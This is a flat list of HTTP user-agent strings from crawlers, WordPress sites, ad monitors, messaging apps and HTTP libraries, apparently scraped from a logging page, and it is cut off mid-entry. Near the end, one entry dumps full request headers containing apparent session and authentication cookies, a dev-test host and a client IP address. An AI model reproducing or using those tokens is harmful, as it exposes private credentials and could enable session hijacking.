+WordPress/3.7.5; http://macagolme.unblog.fr +WordPress/3.7.5; http://eleririn.unblog.fr +Apache-HttpClient/4.5.10 (Java/14.0.1) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614041316-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614050246-0 +yacybot (-global; aarch64 Linux 5.4.0-1028-raspi; java 14.0.2; Etc/en) http://yacy.net/bot.html +WordPress/5.6.2; https://staging2.savannahw2.sg-host.com +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.203 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 5.1; Micromax_Q4101 ) U2/1.0.0 Mobile +ARC Reader (https://github.com/semsol/arc2) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614041408-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614050044-10 +WhatsApp/2.21.2.16 A +Astute SRM +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 OPR/73.0.3856.329 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.204 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614042680-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614052031-0 +Java/1.8.0_211 +WhatsApp/2.21.5.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614072412-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614072413-0 +WhatsApp/2.21.31.2 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614084416-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614093583-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614120134-0 +FDM/6.13.1.3483 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 PTST/210222.185558 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/88.0.4324.202 Safari/537.36 +Apache-HttpClient/4.5.10 (Java/11.0.10) +ArchiveTeam ArchiveBot/20210125.7e57a61 (wpull 2.0.3) and not Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1614104342-0 +Java/1.8.0_212-ga +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614127773-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614135279-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614185475-0 +WhatsApp/2.21.5.2 A +python-asks/2.4.12 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614143259-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614129856-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614131581-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614136920-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614138274-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614141749-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614142265-0 +WordPress/5.6.2; https://iniciarbr.net +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 PTST/210223.223207 +Mozilla/5.0 (compatible; WbSrch/1.2 +https://wbsrch.com) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 5.0.2; SM-N910H ) U2/1.0.0 Mobile +WordPress/3.7.5; http://tombredissi.unblog.fr +PHP/7.4 +WordPress/5.6.2; https://hello-papaye.com +WhatsApp/2.21.5.3 A +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.205 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/4.4.8; http://www.econav.es +WordPress/4.9.10; http://daehohitec.kr +WordPress/4.5.4; http://creacion21.cl +WordPress/4.1.32; https://www.benzramkamhaeng24.com +WordPress/5.4.1; http://innguyengiang.com +yacybot (/global; amd64 Linux 5.4.0-66-generic; java 1.8.0_282; Etc/en) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614214716-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614221952-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614281966-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614289923-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614289917-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614218286-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614224668-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614236558-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614236560-0 +Mozilla/5.0 (Windows NT 10.0; WOW64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614257791-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614257804-0 +WhatsApp/2.21.31.3 i +yacybot (/global; amd64 Linux 5.10.0-3-amd64; java 17-ea; Europe/es) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614270755-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614272015-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614272013-0 +WordPress/5.6.2; https://loginfilm.com +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 PTST/210224.185451 +WordPress/5.6.2; https://blogchain.com.ua +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614299892-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614305708-0 +Mozilla/5.0 (Windows NT 10.0; WOW64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614360400-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.206 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.3.6; https://alya.ci +WordPress/4.9.13; http://yakikarintou.com +WordPress/5.1.1; https://thethaovn.com +WordPress/4.8.9; https://utgear.co.za +WordPress/5.5.3; https://rankspecialists.ca +WordPress/4.7.3; http://million-air.in +WordPress/4.9.16; http://logos.info.pl +WordPress/4.7.19; http://mobiliarioidea.pistoconwebo.net +Python/3.7 aiohttp/3.7.4 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614301834-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614307827-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614339848-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614342654-0 +WhatsApp/2.21.5.4 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614358222-0 +WhatsApp/2.21.4.20 A +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.56 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 PTST/210225.213418 +WordPress/5.6.2; https://chiptuninger.com +gogo/Nutch-1.18 +WordPress/5.6.2; https://da.digitaldepo.cz +facebookexternalhit/1.1;line-poker/1.0,gzip(gfe) +AvsDeviceSdk/1.22.0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.6.2; https://onlinetoolweb.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 4.4.2; SM-N900 ) U2/1.0.0 Mobile +WordPress/5.6.2; https://med71.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614386613-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614387669-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614393545-0 +WhatsApp/2.21.5.5 A +WordPress/5.4.4; https://omura-catv.com +WhatsApp/2.2106.10 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614436345-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/88.0.4324.202 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/3.7.5; http://biostatsufti.unblog.fr +WordPress/5.6.1; https://cyberiqs.com +WhatsApp/2.21.4.22 A +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 4.4.2; SM-J727T1 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614474514-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614480702-0 +WordPress/3.7.5; http://ewsaresha.unblog.fr +nicebot +NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 (Java; U; en-us; nokiac3-00) UCBrowser8.4.0.159/70/352/UCWEB Mobile UNTRUSTED/1.0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4201.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Mobile Safari/537.36 PTST/210226.143024 +Python/3.8 aiohttp/3.7.4 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614560893-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614567253-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614570949-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614586405-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 PTST/210226.143024 +python-requests/2.4.3 CPython/3.7.3 Linux/4.9.35-v7+ +PHP (www.mlfm.pw), hosted by www.ukraine.com.ua +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.188 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +PostmanRuntime/7.26.10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.208 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/2.21.40.13 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614706859-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 PTST/210302.133604 +WhatWeb/0.5.5 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614687851-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614705804-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614646940-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614652276-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614669775-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614674177-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/88.0.4324.208 Safari/537.36 +WordPress/5.6.2; https://seconnexion.com +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Mobile Safari/537.36 PTST/210302.133604 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 4.4.4; SM-N900 ) U2/1.0.0 Mobile +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/88.0.4324.208 Mobile Safari/537.36 +GoogleAuth/1.4 (zerolte NRD90M); gzip,gzip(gfe),gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613399467-0 +GuzzleHttp/6.5.5 curl/7.68.0 PHP/7.4.15 +RadiosNet/2.5.0 (Java; Android) +RadiosNet/2.6.2 (Java; Android) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614731265-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614736323-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614738457-10 +WhatsApp/2.21.5.7 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614805349-10 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Mobile Safari/537.36 PTST/210303.183735 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614732452-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614739932-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614767661-0 +WhatsApp/2.21.5.6 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614800056-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1614801749-0 +okhttp/3.12.13 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 PTST/210302.133604 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Mobile Safari/537.36 PTST/210302.133604 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/88.0.4324.202Safari/537.36 +Apache-HttpAsyncClient/4.1.4 (Java/1.8.0_271) +WordPress/5.6.2; https://tvoi-setevichok.ru +Apache-HttpClient/4.5.13 (Java/1.8.0_242) +Apache-HttpClient/4.5.13 (Java/1.8.0_181) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614787138-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614787141-0 +WordPress/5.5.3; https://monisaver.com +python-requests/2.6.0 CPython/2.7.5 Linux/4.14.180-37.el7.centos.x86_64 +{"headers":{"Connection":"close","Content-Length":"1424","Content-Type":"application/json; charset=UTF-8","Accept":"application/json, text/javascript, */*; q=0.01", "Accept-Encoding":"gzip, deflate, br","Accept-Language":"en-US,en;q=0.9,lt;q=0.8", "Cookie":"_ga=GA1.2.2011366028.1607075435; __Secure-AppframeWebSession=594198bc-28d4-4c39-ac1c-58e8500c4fd4; timezone=2; AppframeWebCT=Bo3VyFKIY1ZI0yNxZiZc+q72UlpAPW+XYN97gDRx4qm/diX82bcN7Qb9s+IsAMbySK/fQHS6Dimp0XQJoKXvICBxLdQKbUMVxL6mkr55O9k=Rfk6oqUaDqpkTlHiSDKS3yt9j3FSOjY10OCcYEcQVdnv84EI0kN7xIX8yQLgJn6ZYwCt2N+1ZkBJIF5htd75jZW6gb5kLSCRkd9YpkRBEu/K4dLvY74SAz9C92lhG66b; __Secure-AppframeWebAuth=2F790523B3107A0AD5D2469E08864888855B8D22BD20B818D5F532AC7769B9E89A6B74B68CF61E21DB6233FE0031B58E6D7A4E88868A5B83263C60D179561BB9D93FB0074862A7DEA9AB16A57E1D2B3370A555AB471C28B0543BE04677379181549F52A944B1F5BBDEB371A389547518","Host":"dev-test.pims.no","Referer":"https://dev-test.pims.no/dcs-my-reviews-sharepoint?ReviewID=AOGD-IR-00000499&Domain=Tor", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4414.0 Safari/537.36 Edg/90.0.803.0", "x-requested-with":"XMLHttpRequest","origin":"https://dev-test.pims.no","sec-fetch-site":"same-origin","sec-fetch-mode":"cors", "sec-fetch-dest":"empty"},"content":"","userhostname":"88.119.135.86","userhostaddress":"88.119.135.86"} +okhttp/3.11.0; CEO Mobile; Android 4.0.1; com.wellsFargo.ceomobile; build:51; Android SDK 26; Android OS 8.0.0; Aubrey B +okhttp/3.11.0; CEO Mobile; Android 4.0.1; com.wellsFargo.ceomobile; build:51; Android SDK 26; Android OS 8.0.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 PTST/210303.183735 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.74 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614844159-0 +WordPress/5.6.2; https://abhilashjnair.in +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614881372-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.79 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614817485-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614823710-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614826097-10 +WhatsApp/2.21.5.8 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614895389-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614818547-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614825052-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) 